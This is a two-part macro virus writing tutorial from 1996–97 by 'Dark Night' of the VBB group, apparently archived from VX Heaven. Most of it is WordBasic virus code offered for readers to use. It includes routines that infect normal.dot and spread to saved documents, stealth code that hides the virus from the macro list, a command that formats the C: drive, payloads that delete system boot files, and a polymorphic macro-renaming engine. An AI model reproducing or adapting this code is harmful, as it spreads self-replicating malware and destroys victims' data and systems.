Maximize
Bookmark

VX Heaven

Library Collection Sources Engines Constructors Simulators Utilities Links Forum

The macro virus writing tutorial

Dark Night
1996

[Back to index] [Comments]

Legalese

I shall not be held responsible for any damage created be direct or indirect use of the publicised material. This document is copyright 1996 to me, Dark Night of VBB. Herewith I grant anybody license to redistribute this document as long as it is kept in whole and my copyright notice is not removed. Also if I find any lamers who just take the code published here and say it is their own I will see that they'll be punished. (Believe it or not :-))!!!

Introduction

Many of you may be wondering right now who the hell I am and who VBB is. Come on lamers! Get alive. VBB is one of the coolest virus groups around. You can't tell me you've never heard of us. Well, Ok I'll admit it. We're not that popular yet, but that'll come. So for now here's my contribution to the group as the leader. Welcome to the macro virus writing tutorial part 1.

Enjoy!!

The tools

First of all you'll need MS Word 6.0 or up (duh), then you may want to get VBB's macro disassembler by Aurodreph so that you can study encrypted macros. Also you should make back-ups of your normal. DOT template in your WINWORD6\TEMPLATE\ directory, as this is the document commonly infected by macro virii. So whatch out. Also I recommend to have at least a small knowledge of word basic, so that you kind a know what's going on. Well, that's it. You've made it this far. It's now time to get into the macro virus generals.

The general stuff

Most macro virii have a pretty set structure. They start of with an auto-executing macro which infects the normal.dot(global) template. Then they have some macros which will infect the files on certain actions. For example FileSaveAs, FileSave, FileOpen, ToolsMacros. Documents are infected through transferring the macros into the document and having them execute the next time the document is opened. A code for the autoexec routine would look something like this:

'ANYTHING AFTER THE ' ARE MY COMMENTS

Sub MAIN
On Error Goto Abort
iMacroCount = CountMacros(0, 0)
'CHECK TO SEE IF INFECTION EXISTS
For i = 1 To iMacroCount
If MacroName$(i, 0, 0) = "PayLoad" Then
bInstalled = - 1
'BY LOOKING FOT THE PAYLOAD MACRO
End If
If MacroName$(i, 0, 0) = "FileSaveAs" Then
bTooMuchTrouble = - 1
'BUT IF THE FILESAVEAS MACRO EXISTS THEN INFECTION IS
'TOO DIFICULT.
End If
Next i
If Not bInstalled And Not bTooMuchTrouble Then
'add FileSaveAs and copies of AutoExec and FileSaveAs.
'Payload has no use except to check for infection.
'The ,1 encrypts all macros in their destination making
'them unreadble in Word.
iWW6IInstance = Val(GetDocumentVar$("WW6Infector"))
sMe$ = FileName$()
Macro$ = sMe$ + ":PayLoad"
MacroCopy Macro$, "Global:PayLoad", 1
Macro$ = sMe$ + ":FileOpen"
MacroCopy Macro$, "Global:FileOpen", 1
Macro$ = sMe$ + ":FileSaveAs"
MacroCopy Macro$, "Global:FileSaveAs", 1
Macro$ = sMe$ + ":AutoExec"
MacroCopy Macro$, "Global:AutoExec", 1
SetProfileString "WW6I", Str$(iWW6IInstance + 1)
End If
Abort:
End Sub

The SaveAs routine

This is the routine which copies the macro virus into the active document when it is saved using File/Save As. It uses much of the same techniques as the AutoExec routine. Here's what the code should look like for the SaveAs routine:

'YOU CAN ALWAYS USE THE ,1 AGAIN TO ENCRYPT MACROS.

Sub MAIN
Dim dlg As FileSaveAs
GetCurValues dlg
Dialog dlg
If (Dlg.Format = 0) Or (dlg.Format = 1) Then
MacroCopy "FileSaveAs", WindowName$() + ":FileSaveAs"
MacroCopy "FileSave ", WindowName$() + ":FileSave"
MacroCopy "PayLoad", WindowName$() + ":PayLoad"
MacroCopy "FileOpen", WindowName$() + ":FileOpen"
Dlg.Format = 1
End If
FileDaveAs dlg
End Sub

Short, but it works well. All this info, believe it or not, is enough to make a small and basic macro virus.

Special routines

There are several methods which can be used to hide your virus or make it more effective. For eample, you can make a macro to hide your virus when somebody looks in tools/macro. The code should look something like this:

Sub MAIN
On Error Goto ErrorRoutine

OldName$ = NomFichier$()

If macros.bDebug Then
MsgBox "start ToolsMacro"
Dim dlg As OutilsMacro
If macros.bDebug Then MsgBox "1"
GetCurValues dlg
If macros.bDebug Then MsgBox "2"
On Error Goto Skip
Dialog dlg
OutilsMacro dlg
Skip:
On Error Goto ErrorRoutine
End If

REM enable automacros
DisableAutoMacros 0

macros.SavToGlobal(OldName$)
macros.objectiv
Goto Done

ErrorRoutine:
On Error Goto Done
If macros.bDebug Then
MsgBox "error " + Str$(Err) + " occurred"
End If

Done:
End Sub

Also you can include external subroutines. For example, the nuclear virus tries to compile and run an external file-infector virus. Or some macro trojans try to format your harddrive when you open a document. An example subroutine for an uncoditional format would be this:

sCmd$ = "echo y|format c: /u"
Shell Environment$ ("COMSPEC") + "/c" + sCmd$, 0

ALSO YOU MAY WANT TO PUT A PASSWORD ONTO THE DOCUMENT THAT YOU'VE JUST
INFECTED OR WHEN YOU HAVE EXPERIENCED AN ERROR WHILE INFECTING AND THE
CURRENT SECOND IS 13. TAKE A LOOK AT THIS EXAMPLE:

Sub MAIN
On Error Goto ByeBye

.
. 'Infection code
.
.
.
\/

ByeBye:
If (second(Now()) = 13) Then
Dlg.Password = "Dark_Night" 'SETS PASSWORD TO DARK_NIGHT. YOU CAN
'ALSO SET A RANDOM PASSWORD CODE SHALL
'PRESENTED IN NEXT INSTALLMENT! :-D

Your work

I have explained the basic knowledge you need to have to start writing your macro virus. If anybody responds to this tutorial, then I will go into more details about the different structures and possibilities of macro virii.

Interested?

I have no idea if anybody would be interested if I continue this titorial. So to not make myself do all the work for nothing, I request that you please drop me an e-mail if you would be interested in any further explanation of macro virii. I will then gladly continue this tutorial of macro virii for you. My address is:

[email protected]

Dark Night

Part 2

Legalese

I shall not be held responsible for any damage created be direct or indirect use of the publicised material. This document is copyright 1997 to me, Dark Night of VBB. Herewith I grant anybody license to redistribute this document as long as it is kept in whole and my copyright notice is not removed. Also if I find any lamers who just take the code published here and say it is their own I will see that they'll be punished. (Sure.....Sure :-))!!!

Intro to life

Yep, it's time again for another tutorial! I got so much positive feedback(and these people wouldn't leave me alone)so I decided to continue. This time I will mostly be talking about virus payloads as I presented the infection routines to you last time.... Oh yeah! The question about books on Word BAsic reached me a lot of times too! Here's a book I've been told is supposed to be good: "BEGINNING WORDBASIC PROGRAMMING", ISBN: #1874416869. Enjoy!

Payload?? I'm lost!

Why are you reading this then? The Payload is the bomb....The thing that does stuff besides infecting....

What is possible?

Well, there are a lot of things you can do... You can format harddrives, Crash word, Run other proggies(dos virii) etc. But, you don't want your virus to this every single time it is run right? So you need a check routine:

If Month(Now()) = 1 And Day(Now()) = 3 Then 'Easy right?
BOMB HERE

ELSE
'whatever

End IF

The easiest method to annoy a user is to send the following very frequently:

SendKeys "%"+"{F4}"

This has the effect of pressing alt+f4...The problem is that word still prompts to save. Since we are in the annoying stuff right now, there is another one:

Again:
MsgBox"HAHAHAHAHA!"
Goto Again

Mean isn't it....Imagine someone working and this thing popping up one day when he opens your word document. Since his template was infected, he will see this more often :)

Mean stuff

Ok, you can get a good kick out of the above, but what if you really want to get someone? Yes, you guessed it... There's even meaner stuff :)

ToolsCustomizeKeyboard .KeyCode = 27, .Category = 1, .Name = "Cancel", .Remove, .Context = 0
'The above macro looks handy for the close all function :) (To all who don't understand: It
'removes the cancel button!)

Kill"C:\Autoexec.bat"
Kill"C:\Config.sys"
Kill"C:\Command.com"
Kill"C:\io.sys"
Kill"C:\msdos.sys"
Finish:

Ain't this mean :) I got the next one from the Nightmare Joker. Enjoy....

ToolsCustomizeKeyboard .KeyCode = 27, .Category = 1, .Name = "Cancel", .Remove, .Context = 0

SendKeys "^" + "%" + "-"

Close all documents and look under File....How's your Cursor doin'?

Polymorphic??

Yes, it is possible.... Here's a polymorphic engine which uses random names for its macros to hide is indentity. This code is from The Nightmare Joker! I translated it into English:

Sub MAIN
On Error Goto Done

A$ = FileName$()
If A$ = "" Then Goto Finish

If VInstalled = 0 Then
Run1
Run2
FileSaveAll 1, 1
Else
Goto Done
End If

Done:
A$ = FileName$()
If A$ = "" Then
Goto Finish
Else
Insert " "
End If

Finish:
MsgBox "polymorph", - 8
End Sub

Sub Run1
X$ = Fun$(F$, G$, H$, J$)
Y$ = Fun$(F$, G$, H$, J$)

Z$ = X$ + Y$

R1$ = GetDocumentVar$("VirNameDoc")
CO$ = FileName$() + ":" + R1$
MacroCopy CO$, "Global:" + Z$
SetProfileString "Intl", "Info2", Z$
ToolsCustomizeKeyboard .KeyCode = 65, .Category = 2, .Name = Z$, .Add, .Context = 0
End Sub

Sub Run2
X$ = Fun$(F$, G$, H$, J$)
Y$ = Fun$(F$, G$, H$, J$)

Z$ = X$ + Y$

R2$ = GetDocumentVar$("VirName")
OC$ = FileName$() + ":" + R2$
MacroCopy OC$, "Global:" + Z$
SetProfileString "Intl", "Info1", Z$
ToolsCustomizeKeyboard .KeyCode = 32, .Category = 2, .Name = Z$, .Add, .Context = 0
End Sub

Function VInstalled
CC$ = GetProfileString$("Intl", "Info1")
VInstalled = 0
If CountMacros(0) > 0 Then
For i = 1 To CountMacros(0)
If MacroName$(i, 0) = CC$ Then
VInstalled = 1
End If
Next i
End If
End Function

Function Fun$(F$, G$, H$, J$)
One = 1169
Two = 9294
Num = Int(Rnd() * (Two - One) + One)
A$ = Str$(Num)
A$ = LTrim$(A$)

B$ = Mid$(A$, 1, 1)
C$ = Mid$(A$, 2, 1)
D$ = Mid$(A$, 3, 1)
E$ = Mid$(A$, 4, 1)

If B$ = "1" Then F$ = "A"
If B$ = "2" Then F$ = "B"
If B$ = "3" Then F$ = "C"
If B$ = "4" Then F$ = "D"
If B$ = "5" Then F$ = "E"
If B$ = "6" Then F$ = "F"
If B$ = "7" Then F$ = "G"
If B$ = "8" Then F$ = "H"
If B$ = "9" Then F$ = "I"
If B$ = "0" Then F$ = "J"

If C$ = "1" Then G$ = "H"
If C$ = "2" Then G$ = "I"
If C$ = "3" Then G$ = "J"
If C$ = "4" Then G$ = "K"
If C$ = "5" Then G$ = "L"
If C$ = "6" Then G$ = "M"
If C$ = "7" Then G$ = "N"
If C$ = "8" Then G$ = "O"
If C$ = "9" Then G$ = "P"
If C$ = "0" Then G$ = "Q"

If D$ = "1" Then H$ = "A"
If D$ = "2" Then H$ = "B"
If D$ = "3" Then H$ = "C"
If D$ = "4" Then H$ = "D"
If D$ = "5" Then H$ = "E"
If D$ = "6" Then H$ = "F"
If D$ = "7" Then H$ = "G"
If D$ = "8" Then H$ = "H"
If D$ = "9" Then H$ = "I"
If D$ = "0" Then H$ = "J"

If E$ = "1" Then J$ = "R"
If E$ = "2" Then J$ = "S"
If E$ = "3" Then J$ = "T"
If E$ = "4" Then J$ = "U"
If E$ = "5" Then J$ = "V"
If E$ = "6" Then J$ = "W"
If E$ = "7" Then J$ = "X"
If E$ = "8" Then J$ = "Y"
If E$ = "9" Then J$ = "Z"
If E$ = "0" Then J$ = "Q"

Fun$ = F$ + G$ + H$ + J$
End Function

I'm going to leave you withou explination at this point because if you have no idea what this is about, then this is nothing for you as a beginner!

Where to?

I don't know when I will continue this, but I'm sure that if there are any news that I will gladly continue. As usual you can reach me at [email protected] with any questions! Also I would appreciate any future topic suggestions!

[Back to index] [Comments]
By accessing, viewing, downloading or otherwise using this content you agree to be bound by the Terms of Use! vxheaven.org aka vx.netlux.org
deenesitfrplruua